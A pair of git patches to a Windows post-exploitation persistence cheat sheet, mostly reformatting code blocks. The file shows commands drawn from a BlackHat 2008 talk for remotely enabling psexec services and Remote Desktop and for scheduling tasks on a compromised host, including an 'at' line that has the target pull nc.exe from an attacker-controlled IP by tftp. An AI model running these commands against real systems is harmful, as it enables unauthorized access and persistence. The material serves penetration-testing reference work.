From e6c517135a444be04a1884cbe021a3d48dc53ce7 Mon Sep 17 00:00:00 2001
From: webbreacher <webbreacher@gmail.com>
Date: Sun, 29 Dec 2013 12:01:22 -0500
Subject: [PATCH 1/2] Finished with Ames content.

---
 persistence/windows/general.md | 16 +++++++++-------
 1 file changed, 9 insertions(+), 7 deletions(-)

diff --git a/persistence/windows/general.md b/persistence/windows/general.md
index 5717985..71336ba 100644
--- a/persistence/windows/general.md
+++ b/persistence/windows/general.md
@@ -17,14 +17,15 @@ Commands to run to maintain persistence after you have exploited it and are usua
 ### Enable `psexec`
 The [`psexec` tool](http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx) executes processes on other systems over a network. Most systems now disable the "clipbook" which `psexec` required. According to Val Smith's and Colin Ames' [BlackHat 2008 presentation (page 50)](http://www.blackhat.com/presentations/bh-usa-08/Smith_Ames/BH_US_08_Smith_Ames_Meta-Post_Exploitation.pdf), you can re-enable the sub-systems needed to use `psexec` using the `sc` commands below.
     
-``c:\> net use \\[TargetIP]\ipc$ username /user:password
+<pre>
+c:\> net use \\[TargetIP]\ipc$ username /user:password
 c:\> sc \\[TargetIP] config netdde start= auto
 c:\> sc \\[TargetIP] config netddedsdm start= auto
 c:\> sc \\[TargetIP] config clipsrv start= auto
 c:\> sc \\[TargetIP] start netdde
 c:\> sc \\[TargetIP] start netddedsdm
 c:\> sc \\[TargetIP] start clipsrv
-``
+</pre>
 
 ### Enable Remote Desktop
 Remote Desktop allows a remote user to receive a graphical "desktop" of the target (compromised) system. According to Val Smith's and Colin Ames' [BlackHat 2008 presentation (page 53)](http://www.blackhat.com/presentations/bh-usa-08/Smith_Ames/BH_US_08_Smith_Ames_Meta-Post_Exploitation.pdf), you can remotely enable remote desktop using the commands below.
@@ -57,20 +58,21 @@ Remote Desktop allows a remote user to receive a graphical "desktop" of the targ
 
  1. On the remote system, execute the following commands:
       
-    ``c:\> sc config termservice start= auto sc config termservice start= auto
+    <pre>c:\> sc config termservice start= auto sc config termservice start= auto
 c:\> regedit /s enable_ts.reg
 c:\> copy c:\windows\security\database\secedit.sdb c:\windows\security\database\new.secedit.sdb
 c:\> copy c:\windows\security\database\secedit.sdb c:\windows\security\database\orig.secedit.sdb
 c:\> secedit /configure /db new.secedit.sdb /cfg fix_ts_policy.ini
 c:\> gpupdate /Force
 c:\> net start "terminal services"
-``
+</pre>
 
 ### Scheduler
-The [Windows scheduler](http://support.microsoft.com/kb/313565) can be used to further compromise a system. According to Val Smith's and Colin Ames' [BlackHat 2008 presentation (page 58)](http://www.blackhat.com/presentations/bh-usa-08/Smith_Ames/BH_US_08_Smith_Ames_Meta-Post_Exploitation.pdf), you can remotely schedule tasks using the commands below.
+The [Windows scheduler](http://support.microsoft.com/kb/313565) can be used to further compromise a system. It usually runs at the SYSTEM account privilege level. According to Val Smith's and Colin Ames' [BlackHat 2008 presentation (page 58)](http://www.blackhat.com/presentations/bh-usa-08/Smith_Ames/BH_US_08_Smith_Ames_Meta-Post_Exploitation.pdf), you can remotely schedule tasks using the commands below.
 
-``c:\> net use \\[TargetIP]\ipc$ password /user:username
+<pre>
+c:\> net use \\[TargetIP]\ipc$ password /user:username
 c:\> at \\[TargetIP] 12:00 pm command
-``
+</pre>
 
 An example you might run on the remote system might be: `at \\192.168.1.1 12:00pm tftp -I [MyIP] GET nc.exe`
\ No newline at end of file

From 7a988e10cbe147cd30b0b9bf9db1c50359574e6e Mon Sep 17 00:00:00 2001
From: webbreacher <webbreacher@gmail.com>
Date: Mon, 30 Dec 2013 16:29:08 -0500
Subject: [PATCH 2/2] Adding space

---
 persistence/windows/general.md | 1 +
 1 file changed, 1 insertion(+)

diff --git a/persistence/windows/general.md b/persistence/windows/general.md
index 71336ba..241ab27 100644
--- a/persistence/windows/general.md
+++ b/persistence/windows/general.md
@@ -67,6 +67,7 @@ c:\> gpupdate /Force
 c:\> net start "terminal services"
 </pre>
 
+
 ### Scheduler
 The [Windows scheduler](http://support.microsoft.com/kb/313565) can be used to further compromise a system. It usually runs at the SYSTEM account privilege level. According to Val Smith's and Colin Ames' [BlackHat 2008 presentation (page 58)](http://www.blackhat.com/presentations/bh-usa-08/Smith_Ames/BH_US_08_Smith_Ames_Meta-Post_Exploitation.pdf), you can remotely schedule tasks using the commands below.